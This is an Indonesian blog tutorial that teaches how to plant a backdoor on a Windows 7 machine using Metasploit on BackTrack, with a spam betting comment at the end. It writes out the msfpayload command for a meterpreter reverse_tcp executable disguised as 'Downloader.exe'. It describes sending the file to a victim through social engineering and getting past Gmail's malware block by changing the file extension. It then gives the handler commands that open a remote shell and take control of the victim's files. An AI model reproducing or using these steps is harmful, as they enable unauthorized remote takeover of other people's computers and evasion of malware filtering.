Membuka Backdoor Menggunakan BackTrack
Pada tulisan ini, saya akan mencoba membuat sebuah backdoor
menggunakan bantuan metasploit yang terdapat pada paket distribusi backtrack.
Tulisan ini tidak mendiskritkan mengenai kelemahan sebuah OS, setiap OS
memiliki kelemahan masing-masing, begitu juga dengan Linux. Linux masih mungkin
di eksploitasi sama dengan Windows, akan tetapi menggunakan metoda yang
berbeda.
Langkah pertama yang perlu dilakukan untuk memasang backdoor
pada target windows 7 adalah membuat file tersebut terlebih dahulu. Cara
membuat file nya pun tergolong mudah. cukup mengetikkan perintah di bawah
ini pada terminal back track anda.
msfpayload windows/meterpreter/reverse_tcp LHOST=[IP Attacker]
LPORT=[Port] x > /folderpenyimpanan/namafile.ekstensi
contoh :
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.28.2
LPORT=4444 x > /root/Desktop/Downloader.exe
File backdoor yang dibuat oleh metasploit tersebut akan
tersimpan pada Desktop backtrack. Hal ini sesuai dengan media penyimpanan yang
dipilih sebelumnya. Setelah file tersebut terbentuk, untuk mendistribusikannya,
bisa menggunakan beberapa cara, bisa dengan bypass langsung/serang langsung
pada target atau menggunakan teknik soceng terhadap korban. Untuk
mendistribusikan dengan teknik soceng, attacker cukup mengupload file backdoor
di internet atau bisa mengirimkan file tersebut kepada korban.
Gambar diatas merupakan screenshot dari percobaan mengirimkan
file backdoor menggunakan e-mail. Dalam percobaan diatas, saya menggunakan
layanan gmail untuk mendistribusikannya, akan tetapi gmail mem-block aksi yang
dilakukan karena terindikasi file tersebut mengandung virus/malware. Untuk
mengakali hal tersebut sangat mudah, bisa dengan melakukan compile ulang
terhadap prgoram (cracking program) atau dengan cara sederhana merubah tipe
data file tersebut dari exe menjadi sebuah file. Kali ini saya akan memilih
opsi yang lebih cepat dengan merubah tipe data file dan mencoba
mendistribusikannya kembali
Setelah melakukan perubahan terhadap tipe data file, website
file hosting seperti 4shared sudah tidak melakukan block lagi terhadap file
backdoor. Sampai pada tahapan ini tugas kita sebagai attacker sudah selesai
dilakukan. Tinggal bagaimana cara mendsitribusikan file tersebut. Saya
asumsikan disini, attacker berhasil mempengaruhi korban untuk mendownload file
tersebut, dan merubah kembali tipe data file menjadi file executable.
Sampai tahap ini, berarti proses menanam backdooring sudah
sampai 60 persen, attacker tinggal menunggu korban mengeksekusi file tersebut
dan mengaktifkan eksploitasi pada komputer attacker. Untuk mengaktifkan
eksploit sendiri dapat mengetikkan perintah dibawah ini pada software eksploitasi
metasploit
msf exploit (handler) > use /exploit/multi/handler
msf exploit (handler) > set PAYLOAD
windows/meterpreter/reverse_tcp
msf exploit (handler) > set LHOST [IP Attacker]
msf exploit (handler) > exploit
contoh
msf exploit (handler) > use /exploit/multi/handler
msf exploit (handler) > set PAYLOAD
windows/meterpreter/reverse_tcp
msf exploit (handler) > set LHOST 192.168.28.2
msf exploit (handler) > exploit
apabila metasploit sudah memberikan respon seperti diatas,
berarti attacker sudah siap melakukan keseluruhan persiapan dan tinggal
menunggu file backdoor dijalankan oleh client. Apabila file tersebut sudah
dijalankan oleh client, maka metasploit akan memberikan respon seperti gambar
dibawah ini
Apabila sampai tahapan ini berhasil dilakukan, berarti kita
berhasil menanam backdoor dan bisa mengontrol komputer korban. Kita bisa
memindahkan file, meng-copy file dari komputer korban bahkan menghapus file
tersebut. Untuk memastikan apakah komputer yang kita susupi memang komputer
korban dapat mengetikkan perintah sysinfo dan perintah shell untuk masuk
kedalam terminal CMD korban. Berikut ditampilkan contoh penulisan dan gambar
hasil proses
Apabila sudah sesuai dengan properties dari komputer korban,
berarti backdoor berhasil ditanam dan misi sudah berhasil dilakukan. Untuk
memastikan apakah benar-benar bisa melakukan proses penulisan file, pengopyan
file bahkan penghapusan file silahkan langsung melakukannya pada terminal yang
ada. Contoh kali ini saya akan mencoba membuat sebuah folder yang bernama
test_backdooring pada desktop korban
sampai tahapan ini berarti proses telah selesai dilakukan,
tergantung kreatifitas attacker untuk memanfaatkan komputer tersebut.
1 comment:
10 best betting sites UK that accept bitcoins in 2021
The best betting sites in the UK are the likes of William Hill and Betfred, 토토사이트 while Bet365 and Ladbrokes also offer different sports to bet on. In general,
Post a Comment